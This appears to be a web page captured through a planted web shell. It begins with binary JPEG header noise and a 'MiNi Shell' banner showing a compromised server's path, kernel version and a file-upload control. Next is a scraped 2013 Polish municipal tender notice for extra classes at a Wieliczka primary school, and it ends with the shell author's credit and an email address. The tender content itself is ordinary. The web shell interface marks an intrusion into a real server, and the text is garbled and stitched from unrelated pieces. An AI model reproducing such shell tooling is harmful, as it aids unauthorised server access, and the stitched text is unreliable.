JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130926/197385-N-2013.html

<p class="kh_header"><b>Wieliczka: Przeprowadzenie zajęć dodatkowych w Szkole Podstawowej nr 3 w Wieliczce               w ramach projektu Akademia sukcesu - indywidualizacja nauczania i wychowania uczniów klas I-III w Gminie Wieliczka współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 197385 - 2013; data zamieszczenia: 26.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wieliczka , ul. Powstania Warszawskiego 1, 32-020 Wieliczka, woj. małopolskie, tel. 12 263 41 00, faks 12 278 68 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wieliczka.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć dodatkowych w Szkole Podstawowej nr 3 w Wieliczce               w ramach projektu Akademia sukcesu - indywidualizacja nauczania i wychowania uczniów klas I-III w Gminie Wieliczka współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia

3.1 Informacje o projekcie
Projekt Akademia sukcesu - indywidualizacja nauczania i wychowania uczniów klas I-III w Gminie Wieliczka realizowany jest jako projekt systemowy w oparciu o umowę o dofinansowanie zawartą pomiędzy Wojewódzkim Urzędem Pracy w Krakowie a Gminą Wieliczka. Projekt dofinansowany ze środków Europejskiego Funduszu Społecznego - Programu Operacyjnego Kapitał Ludzki: Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.
3.2 Przedmiotem zamówienia jest:
Przedmiotem zamówienia jest organizacja, przygotowanie i przeprowadzenie zajęć dodatkowych wspierających proces indywidualizacji nauczania i wychowania uczniów z klas I-III w Szkole Podstawowej nr 3 w Wieliczce, dla której organem prowadzącym jest Gmina Wieliczka w ramach współfinansowanego ze środków Unii Europejskiej projektu Akademia sukcesu - indywidualizacja nauczania i wychowania uczniów klas I-III w Gminie Wieliczka.Planuje się przeprowadzenie zajęć w 32 grupach dla 174 uczniów przez 1216 godzin zajęć.

3.3 Opis przedmiotu zamówienia:
1) Zgodnie z zasadami realizacji projektów systemowych, w odniesieniu do poszczególnych rodzajów zajęć udział pojedynczego ucznia nie może być mniejszy niż 30 godzin w całym roku szkolnym.
2) Zajęcia dodatkowe co do zasady będą się odbywać w salach lekcyjnych Szkoły Podstawowej nr 3 w Wieliczce, z wyłączeniem sytuacji, gdy z planowanego opisu zajęć wynika możliwość organizacji zajęć w innych miejscach.
3) Wykonawca we współpracy z Dyrektorem szkoły opracuje program zajęć dla każdej grupy zajęciowej z uwzględnieniem charakterystyki opisanej w niniejszym zamówieniu oraz indywidualnych potrzeb uczniów.
4) Wykonawca jest zobowiązany do ścisłej współpracy z Dyrektorem szkoły w której będzie prowadził zajęcia, w szczególności w kwestiach związanych z realizacją programu zajęć i jego modyfikacjami.
5) Harmonogram realizacji zajęć i jego zmiany, przy uwzględnieniu możliwości organizacyjnych Wykonawca uzgodni każdorazowo z Dyrektorem szkoły. Harmonogram musi zawierać co najmniej: daty i godziny prowadzonych zajęć, nazwę zajęć, imię i nazwisko osoby prowadzącej zajęcia, oznaczenie grupy zajęciowej.
6) Liczebność uczniów w grupach nie przekroczy dopuszczalnej liczby uczniów określonej dla danego typu zajęć w Rozporządzeniu Ministra Edukacji Narodowej z dnia 30 kwietnia 2013 r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach (Dz. U. z 2013 r., poz. 532).
3.4 Charakterystyka zajęć planowanych do przeprowadzenia w Szkole Podstawowej nr 3 w Wieliczce:
1) Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji
Opis planowanych zajęć:
Przeprowadzenie zajęć korekcyjno-kompensacyjnych dla uczniów, którzy mają różnorodne trudności w opanowaniu umiejętności czytania i pisania, spowodowane najczęściej  parcjalnymi deficytami rozwojowymi jak: dysleksja, dysgrafia, dysortografia, ze szczególnym uwzględnieniem nauki języka polskiego i matematyki.
Charakterystyka zajęć:
.         liczba grup zajęciowych - 7 grup
.         łączna liczba godzin zajęć do zrealizowania w roku 2013 - 133 godz.
.         łączna liczba godzin zajęć do zrealizowania w roku 2014 - 133 godz.
.         godzina zajęć - 45 min.
.         liczba uczniów w grupie - 5 uczniów
.         łączna liczba uczniów objętych wsparciem - 35 uczniów
2) Zajęcia logopedyczne
Opis planowanych zajęć:
Zajęcia logopedyczne prowadzone celem niwelowania najczęstszych zaburzenia mowy u dzieci jak sygmatyzm i rotacyzm.
Charakterystyka zajęć:
.         liczba grup zajęciowych - 4 grupy
.         łączna liczba godzin zajęć do zrealizowania w roku 2013 - 76 godz.
.         łączna liczba godzin zajęć do zrealizowania w roku 2014 - 76 godz.
.         godzina zajęć - 60 min.
.         liczba uczniów w grupie - 4 uczniów 
.         łączna liczba uczniów objętych wsparciem - 16 uczniów
3) Zajęcia socjoterapeutyczne i psychoedukacyjne
Opis planowanych zajęć:
Zajęcia psychoedukacyjne skierowane do dzieci z trudnościami  w zachowaniu polegającymi na nadmiernej aktywności, nadruchliwości, impulsywności oraz deficytach uwagi.
Zajęcia psychoedukacyjne dla uczniów z zaniżoną samooceną, brakiem pewności siebie, trudnościami w wyrażaniu emocji. 
Charakterystyka zajęć:
.         liczba grup zajęciowych - 3 grupy
.         łączna liczba godzin zajęć do zrealizowania w roku 2013 - 57 godz.
.         łączna liczba godzin zajęć do zrealizowania w roku 2014 - 57 godz.
.         godzina zajęć - 60 min.
.         liczba uczniów w grupie - 9 uczniów
.         łączna liczba uczniów objętych wsparciem - 27 uczniów
4) Gimnastyka korekcyjna
Opis planowanych zajęć:
Ćwiczenia ogólnokondycyjne  z elementami  gimnastyki korekcyjnej, mające na celu wzmocnienie mięśni odpowiedzialnych za prawidłową postawę.
Charakterystyka zajęć:
.         liczba grup zajęciowych - 15 grup
.         łączna liczba godzin zajęć do zrealizowania w roku 2013 - 285 godz.
.         łączna liczba godzin zajęć do zrealizowania w roku 2014 - 285 godz.
.         godzina zajęć - 60 min.
.         liczba uczniów w grupie - 5 uczniów
.         łączna liczba uczniów objętych wsparciem - 75 uczniów
5) Zajęcia rozwijające uczniów szczególnie uzdolnionych w zakresie przedmiotów matematyczno-przyrodniczych
Opis planowanych zajęć:
Realizacja zajęć rozwijających zainteresowania i zdolności uczniów w zakresie matematyki i przyrody, przygotowujące do udziału w  konkursach przedmiotowych dla uczniów szkół podstawowych.
Charakterystyka zajęć:
.         liczba grup zajęciowych - 3 grupy
.         łączna liczba godzin zajęć do zrealizowania w roku 2013 - 57 godz.
.         łączna liczba godzin zajęć do zrealizowania w roku 2014 - 57 godz.
.         godzina zajęć - 45 min.
.         liczba uczniów w grupie - 7 uczniów
.         łączna liczba uczniów objętych wsparciem - 21 uczniów

3.5. W ramach zamówienia Wykonawca jest zobowiązany do:
- dysponowania co najmniej 15 osobami posiadającymi wymagane kwalifikacje zgodnie z obowiązującymi przepisami oraz doświadczenie do prowadzenia zajęć z uczniami w grupach zajęciowych,
- zachowania szczególnej staranności podczas realizacji zajęć,
- przeprowadzenia zajęć dodatkowych zgodnie z zakresem programowym i harmonogramem ustalonymi we współpracy z Dyrektorem szkoły,
- prowadzenie zajęć zgodnie z obowiązującymi przepisami prawa i zasadami bezpiecznych i higienicznych warunków nauki,
- korzystania z dostarczonych przez szkołę pomocy dydaktycznych celem podniesienia efektów prowadzonych zajęć,
- prowadzenia ewidencji zajęć odpowiadającej ustalonemu harmonogramowi,
- informowania Dyrektora szkoły o problemach w realizacji zajęć,
- monitorowania postępu uczniów poprzez:
a) prowadzenie dziennika lekcyjnego dla każdej grupy zajęciowej wraz z listą obecności potwierdzającą udział uczniów w zajęciach,
b) przygotowanie dla Zamawiającego danych do sprawozdawczości wymaganej w ramach Programu Operacyjnego Kapitał Ludzki,  
- wykonania przedmiotu zamówienia zgodnie z zawartą umową.

3.6 Nazwy i kody dotyczące przedmiotu zamówienia określone we wspólnym Słowniku Zamówień (CPV):
80 10 00 00-5 usługi szkolnictwa podstawowego.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67. 1. 6. uPzp do wysokości 50 % wartości zamówienia podstawowego, polegających na powtórzeniu tych samych usług, co w zamówieniu podstawowym.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.02.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować minimalną ilością  osób ( tj.  Ogółem 15 osób), posiadających odpowiednie kwalifikacje oraz doświadczenie do przeprowadzenia  odpowiednich zajęć wg  opisu zawartego w tabeli nr 1:
Tabela 1
L.p.
Min. liczba osób i zakres czynności
Wymagane min. kwalifikacje
Wymagane min. doświadczenie
1:
 4 osoby do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji,
kwalifikacje do prowadzenia zajęć dla dzieci z trudnościami w czytaniu i pisaniu określone w § 4 ust. 1 i 2 Rozporządzenia MEN z dnia z dnia 12 marca 2009 r. (Dz. U. z 2009 r. Nr 50, poz. 400 z późn. zm.),
doświadczenie zawodowe - polegające na przeprowadzeniu w okresie ostatnich trzech lat przed upływem terminu  składania ofert  co najmniej 30 godzin zajęć dydaktycznych (po 45 minut) dla dzieci z trudnościami w czytaniu i pisaniu na poziomie klas I-III szkoły podstawowej.     
2:
2 osoby do prowadzenia zajęć logopedycznych,
kwalifikacje do prowadzenia zajęć logopedycznych określone w § 21 ust. 2 Rozporządzenia MEN z dnia z dnia 12 marca 2009 r. (Dz. U. z 2009 r. Nr 50, poz. 400 z późn. zm.),
doświadczenie zawodowe polegające na przeprowadzeniu w okresie ostatnich trzech lat przed upływem terminu składania ofert co najmniej 30 godzin zajęć logopedycznych (min. po 45 minut) na poziomie klas I-III szkoły podstawowej.     
3:
2 osoby do prowadzenia zajęć socjoterapeutycznych i psychoedukacyjnych,
kwalifikacje do prowadzenia zajęć socjoterapeutycznych i psychoedukacyjnych określone w § 4 ust. 1 i 2 Rozporządzenia MEN z dnia z dnia 12 marca 2009 r. (Dz. U. z 2009 r. Nr 50, poz. 400 z późn. zm.),
doświadczenie zawodowe polegające na przeprowadzeniu w okresie ostatnich trzech lat przed upływem terminu składania ofert co najmniej 30 godzin zajęć socjoterapeutycznych i psychoedukacyjnych (min. po 45 minut) na poziomie klas I-III szkoły podstawowej.     
4:
4 osoby do prowadzenia zajęć gimnastyki korekcyjnej,
kwalifikacje do prowadzenia zajęć z gimnastyki korekcyjnej określone w § 4 ust. 1 i 2 Rozporządzenia MEN z dnia z dnia 12 marca 2009 r. (Dz. U. z 2009 r. Nr 50, poz. 400 z późn. zm.),
doświadczenie zawodowe polegające na przeprowadzeniu w okresie ostatnich trzech lat przed upływem terminu składania ofert co najmniej 30 godzin zajęć gimnastyki korekcyjnej (min. po 45 minut) na poziomie klas I-III szkoły podstawowej.        
5:
3 osoby do prowadzenia zajęć rozwijających uczniów szczególnie uzdolnionych w zakresie przedmiotów matematyczno-przyrodniczych,
kwalifikacje do prowadzenia zajęć w zakresie rozwijania przez uzdolnionych uczniów zainteresowań z przedmiotów matematyczno-przyrodniczych określone w § 4 ust. 1 i 2 Rozporządzenia MEN z dnia z dnia 12 marca 2009 r. (Dz. U. z 2009 r. Nr 50, poz. 400 z późn. zm.),
doświadczenie zawodowe polegające na przeprowadzeniu w okresie ostatnich trzech lat przed upływem terminu składania ofert co najmniej 30 godzin zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych z przedmiotów matematyczno-przyrodniczych (po 45 minut) na poziomie klas I-III szkoły podstawowej.   
Uwaga! Ilekroć powyżej jest mowa o Rozporządzeniu MEN z dnia z dnia 12 marca 2009 r. (Dz. U. z 2009 r. Nr 50, poz. 400 z późn. zm.), rozumie się przez to Rozporządzenie Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009 r. Nr 50, poz. 400 z późn. zm.)
UWAGA! W związku z terminem wykonania zamówienia, oraz warunków technicznych realizacji projektu, Zamawiający wymaga minimum 15 osób i nie dopuszcza, aby jedna osoba prowadziła więcej niż jeden rodzaj zajęć, np. dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji oraz zajęcia logopedyczne, pomimo posiadanych uprawnień.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz oferty - sporządzony według formularza stanowiącego Zał. nr 1 do SIWZ.
2. Wypełniony formularz cenowy - sporządzony według formularza stanowiącego Zał. Nr 1a do SIWZ.
3. Wskazanie tej części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcy - sporządzone według formularza stanowiącego Zał. nr 6 do SIWZ. Niezłożenie załącznika nr  6 do oferty jest rozumiane przez Zamawiającego, że Wykonawca nie powierza żadnej części zamówienia podwykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty w przypadku (art. 144 ust. 1 uPzp):
19.1 zmian nazwy, siedziby lub innych danych Wykonawcy;
19.2 prośby Wykonawcy o udział lub zmianę podwykonawców na podwykonawców o kwalifikacjach nie niższych niż podwykonawcy zastępowani;
19.3 zmiany terminu wykonywania umowy wynikającą z przedłużającego się wykonawstwa z powodu zdefiniowanej siły wyższej tj zdarzenia o charakterze zewnętrznym niezawinionym i niezależnym oraz takim któremu nie można było zapobiec zarówno po stronie Wykonawcy albo Zamawiającego;
19.4 zmianę terminu wykonywania umowy wynikającą z przedłużających się procedur związanych z zamówieniami publicznymi lub procedur administracyjnych 
19.5wszelkich zmian wynikających z konieczności dostosowania warunków już zawartej umowy do nowych uregulowań prawnych;
19.6 wszelkich zmian w projekcie zatwierdzonych przez Wojewódzki Urząd Pracy w Krakowie dotyczących w szczególności terminu i zakresu zadań przewidzianych do realizacji i finansowania projektu;
19.7zmiany terminu wykonywania zamówienia w związku ze zmianą harmonogramu realizacji projektu.
19.8Zmiany osób wykonujących usługę  na osoby posiadające kwalifikacje i doświadczenie zgodne z SIWZ w wyjątkowych sytuacjach losowych a mianowicie; z powodu utraty uprawnień, udowodnionej, nie budzącej wątpliwości długotrwałej niemożności wykonywania usługi, śmierci.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wieliczka.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Zamówień Publicznych Urzędu Miasta i Gminy w Wieliczce, 32-020 Wieliczka ul. Sienkiewicza 2 tel. (12) 26 34 331 w godz. 08:00-16:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2013 godzina 09:50, miejsce: Sekretariat Burmistrza Miasta i Gminy w Wieliczce, 32-020 Wieliczka, ul. Powstania Warszawskiego 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Projekt Akademia sukcesu - indywidualizacja nauczania i wychowania uczniów klas I-III w Gminie Wieliczka realizowany jest jako projekt systemowy w oparciu o umowę o dofinansowanie zawartą pomiędzy Wojewódzkim Urzędem Pracy w Krakowie a Gminą Wieliczka. Projekt dofinansowany ze środków Europejskiego Funduszu Społecznego - Programu Operacyjnego Kapitał Ludzki: Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.

2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek w zakresie art. 22 ust. 1 uPzp, może być spełniony łącznie przez tych Wykonawców, natomiast w zakresie art. 24 uPzp każdy z członków konsorcjum lub spółki cywilnej nie może podlegać wykluczeniu na jego podstawie.

4. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę dokumentów i oświadczeń wymaganych postanowieniami SIWZ przy zastosowaniu formuły: złożył dokumenty potwierdzające spełnianie warunków / nie złożył dokumentów potwierdzających spełnianie warunków.

5. Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.  

6. Dokumenty sporządzone w języku obcym Wykonawca składa wraz z tłumaczeniem na język polski.

7. W przypadku składania oferty wspólnej przez kilku wykonawców, każdy ze wspólników musi złożyć dokumenty wymienione w punkcie III.4.2., oraz listę/informację o której mowa w pkt III.4.4. Pozostałe dokumenty będą traktowane wspólnie. Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego. Do oferty należy załączyć - w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez notariusza - pełnomocnictwo do reprezentowania wykonawców wspólnie występujących w postępowaniu..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com